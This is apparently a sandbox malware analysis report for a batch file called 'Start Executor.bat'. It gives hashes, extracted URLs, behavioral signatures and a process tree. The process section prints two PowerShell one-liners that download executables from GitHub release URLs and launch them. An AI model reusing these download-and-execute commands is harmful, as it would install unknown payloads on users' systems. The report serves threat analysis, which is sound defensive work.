Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
  max time kernel: 77s
  max time network: 81s
  platform: windows7_x64
  resource: win7-20240704-en
  resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  submitted: 12/07/2024, 20:45
Static task: static1
Behavioral task: behavioral1
  Sample: Start Executor.bat
  Resource: win7-20240704-en
General
  Target: Start Executor.bat
  Size: 551B
  MD5: fe821790779e191b514f7d90b381d191
  SHA1: 03be2cfc52ec390a30209c33f7ea3a42589a0785
  SHA256: 6afbbef338a695004853bb806f146efdd2d216a1fa58cb34fd10509495b4415b
  SHA512: 425cdb0bd257a71a952293c77984635484dd30a6fc8c9f287100a99016ffc51a884442595eb6eed102fcbceebb6b01f609ba45f5fb2535a3156a8eef04ab50aa
Malware Config
  Extracted: https://github.com/vlyian/scorpix/releases/download/vypix/Scorpix-ExecutorV3.exe
  Extracted: https://github.com/vlyian/scorpixe/releases/download/vypix/ScorpixDLL.exe
Signatures

Blocklisted process makes network request (4 IoCs)
  flow  pid   Process
  3     2064  powershell.exe
  4     2064  powershell.exe
  6     3060  powershell.exe
  7     3060  powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  2064  powershell.exe
  3060  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description                pid   Process
  Token: SeDebugPrivilege    2064  powershell.exe
  Token: SeDebugPrivilege    3060  powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  description                        pid   Process  procid_target
  PID 2508 wrote to memory of 2064   2508  cmd.exe  30
  PID 2508 wrote to memory of 2064   2508  cmd.exe  30
  PID 2508 wrote to memory of 2064   2508  cmd.exe  30
  PID 2508 wrote to memory of 3060   2508  cmd.exe  31
  PID 2508 wrote to memory of 3060   2508  cmd.exe  31
  PID 2508 wrote to memory of 3060   2508  cmd.exe  31
Processes

C:\Windows\system32\cmd.exe (PID 2508)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Start Executor.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2064, child of 2508)
    Command line: powershell $down=New-Object System.Net.WebClient;$url='https://github.com/vlyian/scorpix/releases/download/vypix/Scorpix-ExecutorV3.exe';$file='Scorpix-ExecutorV3.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3060, child of 2508)
    Command line: powershell $down=New-Object System.Net.WebClient;$url='https://github.com/vlyian/scorpixe/releases/download/vypix/ScorpixDLL.exe';$file='ScorpixDLL.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: bbbd657d0a0b9541d07602fc3823882e
  SHA1: c71e244465c2513cf847e7087ef34ed05c49a64d
  SHA256: 762ddc836e3e8d684711371eae034b69aaa3d313c7a8600f98ca473928a1f353
  SHA512: 0e5c9b932889bc8cf736dca9dd690a4fc4e6fea17d94f9698252c6922c30f019a2dc86228db83ea608d99afa1afa6af2e0ed99739f8a59ff91758f1450e1241e